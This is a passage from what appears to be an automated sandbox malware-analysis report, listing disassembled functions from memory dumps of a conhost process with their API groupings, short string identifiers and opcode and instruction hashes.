                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: B7114C23310E6087E758CB52B85871A76A0B789BE4F444316EA5A87B95DF3CC5088741
                                            Function 000002A5AF366270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 9145d667348f50b5d57d8eb2e15a7918ec1153cc53b8dad76a120805eae4d854
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 44D16477308F9882DBA49B0AF49835B67A0F789B88F500217EA8D477A6DF38C555CB41
                                            Function 000002A5AF362098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: fe9a60ac80b48ddef9e0d1b9a9cbb9d440ced9b36274ff17718f182462466e21
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: FE518722302F6597EF8DDF15F85829773A1AB06748F444A27A61D077A6EF78C51CC382
                                            Function 000002A5AF3635C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 467d8dbdfa9e06ebbfa97c665612e9d950b9f133336c1f59128c9aeee4634ec9
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: B3317E23701FA183FB99DF16B58876B63A0FB56B84F0842238F4947B56EF38D4698701
                                            Function 000002A5AF36C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: e180a0fe980a3e263765049bb6bfde7fb3b526674728081bd2d56badd9f5dcb2
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: A5114F27305E6083FB9CA732781D36F2291AB877D5F544727A866567CBDE28D4094702
                                            Function 000002A5AF361A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: dcb824a40935339dac856b7cec85bb309ea266492ac2b7a6eac888e15fbcb4ce
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: E6013922711E9083FB98DB12B85835A63A1F789FC0F4842379E4943755DE38C589C741
                                            Function 000002A5AF363E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 2959b77e3c3cdd99586a9154ce7ffeb22e4ca944c50c7c89cf8796626b504bf3
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 0D010966712F5083FBAC9B22F84C71772A0AB46B45F14022BDA4907366EF3DC04CC742
                                            Function 000002A5AF361AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: 445f7383d2b4b0a8255a2eec05a34b68bf5972eb02ab610cb265dfd4e4cb456e
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 34F0A423314E9593FB68DB20F48835B7360F749B88F844123CA4943555DF6CC68CC701
                                            Function 000002A5AF36B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: f24e64302c5775dbc59dcc35033a4fb88b08f9ce441c419356bfdfe7cb287cae
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 6FF01263311E1182EB5CCB24B89935B6364AB86761F54071BDA69465E6DF28C44CC602
                                            Function 000002A5AF363708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 69e44681c45a294e89067f2f41181c451235d7af0cca2bb84670f1c25f1c68af
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: C4F05456314FA083FB8C8B12B91821B6251AB49FC1F444233ED4A07726CE28C4498701
                                            Function 000002A5AF365810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 5b3f05bcbc5d8f3b32beda00b7088fa40b5690ad4ae9f3f87b7b9c91e83a4792
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: 7102A733319B9486EBA48B55F49435BBBA0F385794F104127EA8E87BA9DF7CC458CB01
                                            Function 000002A5AF362C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: 4153f7a27b4c78ccb8ebecf1bd9c05e6efd8b34a74f871116b4908281b273167
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: CE51B233304A6187EBA8DB16F448A5BB7A0F786B44F21821B9E5A43756DF38C849C751
                                            Function 000002A5AF362AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: dd2aa094d8c2cd07aa85d0bda7a8fd2117c572e17e347d652eaee2515588d969
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: E9515037314A6187EBA8DF16F44861BB7A0F78AB84F51821BDE4A43756DF38D8098B41
                                            Function 000002A5AF365E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: 615aae7d3f6d99732f8decee43a8598ff6c027492f0da07277f1c3f05233b384
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: EA619676329A54C7E7A48B15F45831BB7A0F389784F101227FA8E47BA9DF7CC5488B42
                                            Function 000002A5AF363EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 115325d4e53982b7f827ee9d917fc1e7bf48b5cd172efcd13e3098bcd0bcc4fa
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: FF110726705B9093EBA88B21F40821BB7B0FB46B84F040227EA4D077A5EF6DD958C785
                                            Function 000002A5AF368CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 2eb05f03c259af8622f592e53d25737ce577f94d4c4bb64b8be16e1c7e056564
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 0F51A433311E208BEB98CB15F44876F7795EB5AB98F144213EA4A4778ADFB8C849C711
                                            Function 000002A5AF339EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 0a7731774aae4b735481d6dca671accfd74297adf9cdf2ab9b2016a18bc96007
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 3A51A03B300A91CBEB78CF19A54835A77A1F356B99F144317DA9A47B96CF38C458C702
                                            Function 000002A5AF36AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 7d55edc30564eb19836d5810678b9cdc88fc639b1fbd3246ca58bee467659de2
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: F0515E33300A908BEFB88F21A54835B7BE5F356B94F144217DA9987B96CF38D458DB02
                                            Function 000002A5AF36A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: ee618fd70a71a7276b51e5a4eef5b8d60680ef9aff20c90fb8ed5d7c5e1dd0b8
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: DA618B33704BC482EBA88F15F44439BBBA0F786B94F144217EA8953B96DF38C098CB01
                                            Function 000002A5AF363950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 214f91a4f3ded26d4e3433eaff72f64e6d800ffd471968e3902c4658960237d1
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: A5117F13310FA193FB989B25F80839B62A4F75A784F9442679E8983796EF68C90DC701
                                            Function 000002A5AF371FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
